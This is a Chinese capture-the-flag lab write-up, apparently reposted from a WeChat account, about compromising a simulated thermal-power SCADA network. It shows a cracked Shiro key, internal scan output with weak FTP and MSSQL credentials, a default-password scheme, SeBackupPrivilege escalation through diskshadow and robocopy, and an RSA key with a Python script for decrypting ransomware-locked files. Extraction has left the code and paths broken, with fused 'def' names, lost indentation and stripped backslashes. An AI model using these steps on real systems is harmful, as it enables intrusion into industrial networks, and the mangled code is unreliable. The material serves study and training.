外网
remember,shiro框架
工具扫描
看到heapdump,盲猜解密得到key,shiro一把梭
QZYysgMYhG6/CzIJlVpR2g==
果真一把梭
内网代理
fscan扫内网
172.22.17.213:8080 open
172.22.17.6:445 open
172.22.17.6:139 open
172.22.17.6:135 open
172.22.17.6:80 open
172.22.17.213:22 open
172.22.17.6:21 open
[*] NetInfo
[*]172.22.17.6
[->]WIN-ENGINEER
[->]172.22.17.6
[*] NetBios 172.22.17.6 WORKGROUPWIN-ENGINEER
[*] WebTitle http://172.22.17.213:8080 code:302 len:0 title:None 跳转url: http://172.22.17.213:8080/login;jsessionid=4C3BE6927F06F140583A6F32A7094EA4
[*] WebTitle http://172.22.17.213:8080/login;jsessionid=4C3BE6927F06F140583A6F32A7094EA4 code:200 len:2936 title:火创能源监控画面管理平台
[+] ftp 172.22.17.6:21:anonymous
[->]Modbus
[->]PLC
[->]web.config
[->]WinCC
[->]内部软件
[->]火创能源内部资料
[*] WebTitle http://172.22.17.6 code:200 len:661 title:172.22.17.6 - /
[+] PocScan http://172.22.17.213:8080 poc-yaml-spring-actuator-heapdump-file
[+] PocScan http://172.22.17.213:8080 poc-yaml-springboot-env-unauth spring2
开全局流量转发,访问泄露的敏感区域得到账号密码
及其他信息总结得到
“
例如,张三的账户名为zhangsan,工号为0801。初始密码将由账户名+@+工号组成,例如,zhangsan@0801。
“
chenhua/chenhua@0813
等
mstsc连接
提权
查看 SeBackupPrivilege 的状态
Import-Module .EnableSeBackupPrivilege.ps1
cd C:
mkdir tmp
diskshadow /s s.dsh
robocopy /b z:UsersAdministratorflag . flag02.txt
s.dsh
set context persistent nowriters
add volume c: alias mydrive
create
expose %mydrive% z:
拿到flag2
172.22.26.xx
fscan扫敏感区域泄露网段
172.22.26.11:80 open
172.22.26.11:445 open
172.22.26.11:1433 open
172.22.26.11:139 open
172.22.26.11:135 open
[*] NetBios 172.22.26.11 WORKGROUPWIN-SCADA
[+] mssql 172.22.26.11:1433:sa 123456
[*] NetInfo
[*]172.22.26.11
[->]WIN-SCADA
[->]172.22.26.11
[*] WebTitle http://172.22.26.11 code:200 len:703 title:IIS Windows Server
继续连接
等待加载,点击锅炉开得到flag
勒索病毒
返回桌面发现勒索
navi找到第四个flag,但是空
分析exe文件
“
使用AEScrypto加密
百度网盘给了这两个文件
encryptedAesKey是AES_KEY_ENC
privateKey是PRIVATE_KEY
-
首先用 privateKey
对加密的encryptedAesKey
进行 RSA 解密,得到AES_KEY
。 -
再用 AES_KEY
对加密的文件ScadaDB.sql.locky
解密,得到ScadaDB.sql
。
xml转pem格式得到
-----BEGIN PRIVATE KEY-----
MIICdwIBADANBgkqhkiG9w0BAQEFAASCAmEwggJdAgEAAoGBALqC9ggGlbTFae2+
PyH3HsdgK7brtrb7QTtuSXTMAJ3ruoBDwq0Lw8rMHm3IQNS51d3vjiVeZB8RU6f3
YiM0p5p4VJn2Y2K7IWUixptX08HEay+mGFbH1WRv+FC0g1EXwIocjdRyCz/1qgqr
rtaFqNAncaMDLGaTAz6Hasx3BQsRAgMBAAECgYEAtuLJ687BJ5RYraZac6zFQo17
8A8siDrRmTwozV1o0XGf3DwVfefGYmpLAC1X3QAoxUosoVnwZUJxPIfodEsieDox
RqVxMCcKbJK3nwMdAKov6BpxGUloALlxTi6OImT6w/roTW9OK6vlF54o5U/4DnQN
UM6ss/2/CMM/EgM9vz0CQQDZE+pqh9wn+mEindAUITKLSSPQVlFCaZaaICaD8LQz
J5fbnmZ6PwiyDS/Cz080/dEsuPbk7Wlsgn5+rBZ9QSYXAkEA2/QGgIpqpxODaJLQ
vjS8xnU8NvxMlk110LSUnfAh/E6wB/XUc89HhWMqh4sGo/LAX0n94dcZ4vLMpzbk
Vfy5FwJBALpSudaOno1B/7XytvNQO04KjU75h+31K2tHRUfihwmRZmr/Xv52tEP/
xYr03guiALTeXizJCsA0kdawZu1DyikCQDztieeNcCG77AjJsn0dyrUGwJlSpjx0
VJBtlUVywVdMzMJHvIQgBOXUJHHLdxlvIw7CRkuK9CbDryEauYGAMh0CQCUtrbQd
FiZttt6ZYSUK1qkr7PS3RHk3fHIDVqMk5DDpGCInkU0ZKP0bl7n4MaaZeGy/UUUy
PHvLZB6D8zSyuGw=
-----END PRIVATE KEY-----
rsa解密得到
cli9gqXpTrm7CPMcdP9TSmVSzXVgSb3jrW+AakS7azk=
解密sql文件
# -*- coding: utf-8 -*-
# @Author : iker
# @Time : 2024/03/04 16:10
# @Function: RSA Privatekey Decryption & AES CBC Decryption
import base64
from Crypto.Util.Padding import pad
from Crypto.Cipher import AES
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_v1_5 as Cipher_pkcs1_v1_5
defrsa_decrypt(data):
private_key = """-----BEGIN PRIVATE KEY-----
MIICdwIBADANBgkqhkiG9w0BAQEFAASCAmEwggJdAgEAAoGBALqC9ggGlbTFae2+
PyH3HsdgK7brtrb7QTtuSXTMAJ3ruoBDwq0Lw8rMHm3IQNS51d3vjiVeZB8RU6f3
YiM0p5p4VJn2Y2K7IWUixptX08HEay+mGFbH1WRv+FC0g1EXwIocjdRyCz/1qgqr
rtaFqNAncaMDLGaTAz6Hasx3BQsRAgMBAAECgYEAtuLJ687BJ5RYraZac6zFQo17
8A8siDrRmTwozV1o0XGf3DwVfefGYmpLAC1X3QAoxUosoVnwZUJxPIfodEsieDox
RqVxMCcKbJK3nwMdAKov6BpxGUloALlxTi6OImT6w/roTW9OK6vlF54o5U/4DnQN
UM6ss/2/CMM/EgM9vz0CQQDZE+pqh9wn+mEindAUITKLSSPQVlFCaZaaICaD8LQz
J5fbnmZ6PwiyDS/Cz080/dEsuPbk7Wlsgn5+rBZ9QSYXAkEA2/QGgIpqpxODaJLQ
vjS8xnU8NvxMlk110LSUnfAh/E6wB/XUc89HhWMqh4sGo/LAX0n94dcZ4vLMpzbk
Vfy5FwJBALpSudaOno1B/7XytvNQO04KjU75h+31K2tHRUfihwmRZmr/Xv52tEP/
xYr03guiALTeXizJCsA0kdawZu1DyikCQDztieeNcCG77AjJsn0dyrUGwJlSpjx0
VJBtlUVywVdMzMJHvIQgBOXUJHHLdxlvIw7CRkuK9CbDryEauYGAMh0CQCUtrbQd
FiZttt6ZYSUK1qkr7PS3RHk3fHIDVqMk5DDpGCInkU0ZKP0bl7n4MaaZeGy/UUUy
PHvLZB6D8zSyuGw=
-----END PRIVATE KEY-----"""
data = base64.b64decode(data)
priobj = Cipher_pkcs1_v1_5.new(RSA.importKey(private_key))
decrypted_data = priobj.decrypt(data,None)
return decrypted_data
defpadding(data):
# style(string) – Padding algorithm.It can be ‘pkcs7’ (default), ‘iso7816’ or ‘x923’.
if len(data) % AES.block_size != 0:
return pad(data, AES.block_size, 'pkcs7')
else:
return data
defaes_cbc_encrypt(iv, key, data):
key = padding(key)
data = padding(data)
iv = padding(iv)
aes = AES.new(key, AES.MODE_CBC, iv)
cipher_data = aes.encrypt(data)
return cipher_data
defaes_cbc_decrypt(iv, key, data):
iv = padding(iv)
key = padding(key)
data = padding(data)
aes = AES.new(key, AES.MODE_CBC, iv)
data = aes.decrypt(data)
return data
defdecrypt_file(encrypted_filepath,output_filepath,key):
with open(encrypted_filepath, 'rb') as f:
data = f.read()
iv = b'x00' * 16
decryption_result = aes_cbc_decrypt(iv, key, data)
with open(output_filepath, 'wb') as f:
f.write(decryption_result)
if __name__ == "__main__":
encryptedAesKey = "lFmBs4qEhrqJJDIZ6PXvOyckwF/sqPUXzMM/IzLM/MHu9UhAB3rW/XBBoVxRmmASQEKrmFZLxliXq789vTX5AYNFcvKlwF6+Y7vkeKMOANMczPWT8UU5UcGi6PQLsgkP3m+Q26ZD9vKRkVM5964hJLVzogAUHoyC8bUAwDoNc7g="
key = rsa_decrypt(encryptedAesKey)
encrypted_filepath = "ScadaDB.sql.locky"
output_filepath = "ScadaDB.sql"
decrypt_file(encrypted_filepath,output_filepath,key)
最终
原文始发于微信公众号(flowers-boy):ThermalPower
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论